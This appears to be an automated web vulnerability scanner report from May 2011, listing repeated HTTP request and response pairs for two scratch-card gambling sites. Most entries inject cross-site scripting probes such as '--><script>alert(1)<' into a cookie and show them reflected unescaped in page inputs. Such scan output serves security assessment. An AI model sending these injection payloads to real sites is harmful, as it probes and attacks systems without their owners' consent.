HTTP/1.1 200 OK Date: Mon, 16 May 2011 11:42:02 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 19399 Content-Type: text/html Set-Cookie: ARC=1301372c354%27 Set-Cookie: ASPSESSIONIDCQTRSBSQ Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <1281) { sb = "yes"; } window.open('https:/ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://primescratchcards |
Path: | /images/bg.jpg |
GET /images/bg.jpg HTTP/1.1 Host: primescratchcards.com Proxy-Connection: keep-alive Referer: http://www.primescra User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: pscref=; plstat=0; ARC=13013711f92--><script>alert(1)< |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 11:42:04 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 19447 Content-Type: text/html Set-Cookie: ARC=13013711f92%2D%2D%3E Set-Cookie: ASPSESSIONIDCQTRSBSQ Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <input type=hidden name ="AR" value ="13013711f92--><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://primescratchcards |
Path: | /images/bg.jpg |
GET /images/bg.jpg HTTP/1.1 Host: primescratchcards.com Proxy-Connection: keep-alive Referer: http://www.primescra User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: pscref=; plstat=0; ARC=1301373566c"%3balert(1)/ |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 11:42:01 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 19399 Content-Type: text/html Set-Cookie: ARC=1301373566c%22 Set-Cookie: ASPSESSIONIDCQTRSBSQ Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <img src='http://trk ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://primescratchcards |
Path: | /images/contactus.asp |
GET /images/contactus.asp HTTP/1.1 Host: primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=130137f815d"%3balert(1)/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:28 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 19399 Content-Type: text/html Set-Cookie: ARC=130137f815d%22 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <img src='http://trk ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://primescratchcards |
Path: | /images/contactus.asp |
GET /images/contactus.asp HTTP/1.1 Host: primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=13013763c7a--><script>alert(1)< |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:31 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 19447 Content-Type: text/html Set-Cookie: ARC=13013763c7a%2D%2D%3E Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <input type=hidden name ="AR" value ="13013763c7a--><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://primescratchcards |
Path: | /images/contactus.asp |
GET /images/contactus.asp HTTP/1.1 Host: primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=1301375bef4'%3balert(1)/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:29 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 19399 Content-Type: text/html Set-Cookie: ARC=1301375bef4%27 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <1281) { sb = "yes"; } window.open('https:/ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://primescratchcards |
Path: | /images/fairplay.asp |
GET /images/fairplay.asp HTTP/1.1 Host: primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=1301374f253"%3balert(1)/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:11 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 19399 Content-Type: text/html Set-Cookie: ARC=1301374f253%22 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <img src='http://trk ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://primescratchcards |
Path: | /images/fairplay.asp |
GET /images/fairplay.asp HTTP/1.1 Host: primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=1301376f04e'%3balert(1)/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:12 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 19399 Content-Type: text/html Set-Cookie: ARC=1301376f04e%27 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <1281) { sb = "yes"; } window.open('https:/ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://primescratchcards |
Path: | /images/fairplay.asp |
GET /images/fairplay.asp HTTP/1.1 Host: primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=1301374836b--><script>alert(1)< |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:13 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 19447 Content-Type: text/html Set-Cookie: ARC=1301374836b%2D%2D%3E Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <input type=hidden name ="AR" value ="1301374836b--><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://primescratchcards |
Path: | /images/help.asp |
GET /images/help.asp HTTP/1.1 Host: primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=130137a8db1"%3balert(1)/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:24 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 19399 Content-Type: text/html Set-Cookie: ARC=130137a8db1%22 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <img src='http://trk ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://primescratchcards |
Path: | /images/help.asp |
GET /images/help.asp HTTP/1.1 Host: primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=130137792f9--><script>alert(1)< |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:26 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 19447 Content-Type: text/html Set-Cookie: ARC=130137792f9%2D%2D%3E Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <input type=hidden name ="AR" value ="130137792f9--><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://primescratchcards |
Path: | /images/help.asp |
GET /images/help.asp HTTP/1.1 Host: primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=13013718010'%3balert(1)/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:25 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 19399 Content-Type: text/html Set-Cookie: ARC=13013718010%27 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <1281) { sb = "yes"; } window.open('https:/ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://primescratchcards |
Path: | /images/index.asp |
GET /images/index.asp HTTP/1.1 Host: primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=130137c2d8c'%3balert(1)/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:10 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 19399 Content-Type: text/html Set-Cookie: ARC=130137c2d8c%27 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <1281) { sb = "yes"; } window.open('https:/ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://primescratchcards |
Path: | /images/index.asp |
GET /images/index.asp HTTP/1.1 Host: primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=130137f5f1a"%3balert(1)/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:09 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 19399 Content-Type: text/html Set-Cookie: ARC=130137f5f1a%22 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <img src='http://trk ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://primescratchcards |
Path: | /images/index.asp |
GET /images/index.asp HTTP/1.1 Host: primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=130137bdc95--><script>alert(1)< |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:12 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 19447 Content-Type: text/html Set-Cookie: ARC=130137bdc95%2D%2D%3E Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <input type=hidden name ="AR" value ="130137bdc95--><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://primescratchcards |
Path: | /images/media.asp |
GET /images/media.asp HTTP/1.1 Host: primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=13013759f27"%3balert(1)/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:28 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 19399 Content-Type: text/html Set-Cookie: ARC=13013759f27%22 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <img src='http://trk ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://primescratchcards |
Path: | /images/media.asp |
GET /images/media.asp HTTP/1.1 Host: primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=130137bb723--><script>alert(1)< |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:31 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 19447 Content-Type: text/html Set-Cookie: ARC=130137bb723%2D%2D%3E Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <input type=hidden name ="AR" value ="130137bb723--><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://primescratchcards |
Path: | /images/media.asp |
GET /images/media.asp HTTP/1.1 Host: primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=130137497bd'%3balert(1)/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:29 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 19399 Content-Type: text/html Set-Cookie: ARC=130137497bd%27 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <1281) { sb = "yes"; } window.open('https:/ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://primescratchcards |
Path: | /images/playersclub.asp |
GET /images/playersclub.asp HTTP/1.1 Host: primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=130137c4b23'%3balert(1)/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:18 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 19399 Content-Type: text/html Set-Cookie: ARC=130137c4b23%27 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <1281) { sb = "yes"; } window.open('https:/ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://primescratchcards |
Path: | /images/playersclub.asp |
GET /images/playersclub.asp HTTP/1.1 Host: primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=1301374b793"%3balert(1)/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:16 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 19399 Content-Type: text/html Set-Cookie: ARC=1301374b793%22 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <img src='http://trk ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://primescratchcards |
Path: | /images/playersclub.asp |
GET /images/playersclub.asp HTTP/1.1 Host: primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=130137adf59--><script>alert(1)< |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:19 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 19447 Content-Type: text/html Set-Cookie: ARC=130137adf59%2D%2D%3E Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <input type=hidden name ="AR" value ="130137adf59--><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://primescratchcards |
Path: | /images/promotions.asp |
GET /images/promotions.asp HTTP/1.1 Host: primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=130137634dd--><script>alert(1)< |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:17 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 19447 Content-Type: text/html Set-Cookie: ARC=130137634dd%2D%2D%3E Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <input type=hidden name ="AR" value ="130137634dd--><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://primescratchcards |
Path: | /images/promotions.asp |
GET /images/promotions.asp HTTP/1.1 Host: primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=130137f55e4'%3balert(1)/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:15 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 19399 Content-Type: text/html Set-Cookie: ARC=130137f55e4%27 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <1281) { sb = "yes"; } window.open('https:/ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://primescratchcards |
Path: | /images/promotions.asp |
GET /images/promotions.asp HTTP/1.1 Host: primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=1301378e4a0"%3balert(1)/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:14 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 19399 Content-Type: text/html Set-Cookie: ARC=1301378e4a0%22 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <img src='http://trk ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://primescratchcards |
Path: | /images/terms.asp |
GET /images/terms.asp HTTP/1.1 Host: primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=1301377745f--><script>alert(1)< |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:28 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 19447 Content-Type: text/html Set-Cookie: ARC=1301377745f%2D%2D%3E Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <input type=hidden name ="AR" value ="1301377745f--><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://primescratchcards |
Path: | /images/terms.asp |
GET /images/terms.asp HTTP/1.1 Host: primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=130137b7d47"%3balert(1)/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:25 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 19399 Content-Type: text/html Set-Cookie: ARC=130137b7d47%22 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <img src='http://trk ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://primescratchcards |
Path: | /images/terms.asp |
GET /images/terms.asp HTTP/1.1 Host: primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=130137133fa'%3balert(1)/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:26 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 19399 Content-Type: text/html Set-Cookie: ARC=130137133fa%27 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <1281) { sb = "yes"; } window.open('https:/ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://primescratchcards |
Path: | /images/underage.asp |
GET /images/underage.asp HTTP/1.1 Host: primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=130137cb889--><script>alert(1)< |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:33 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 19447 Content-Type: text/html Set-Cookie: ARC=130137cb889%2D%2D%3E Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <input type=hidden name ="AR" value ="130137cb889--><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://primescratchcards |
Path: | /images/underage.asp |
GET /images/underage.asp HTTP/1.1 Host: primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=130137e3da0'%3balert(1)/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:31 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 19399 Content-Type: text/html Set-Cookie: ARC=130137e3da0%27 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <1281) { sb = "yes"; } window.open('https:/ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://primescratchcards |
Path: | /images/underage.asp |
GET /images/underage.asp HTTP/1.1 Host: primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=13013785468"%3balert(1)/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:38:30 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 19399 Content-Type: text/html Set-Cookie: ARC=13013785468%22 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <img src='http://trk ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | / |
GET /?currency=USD HTTP/1.1 Host: scratch.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=direct-173 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:25:50 GMT Server: Apache X-Powered-By: PHP/5.2.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: affiliate=direct-173 Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:50 GMT; path=/ Set-Cookie: currency=USD; expires=Wed, 15-Jun-2011 12:25:50 GMT; path=/ Set-Cookie: neogamesemail=deleted%7E Connection: close Content-Type: text/html Content-Length: 14558 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content ...[SNIP]... <a href="javascript ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://scratch.co.uk |
Path: | / |
GET /?currency=USD HTTP/1.1 Host: scratch.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: affiliate=direct-173 |
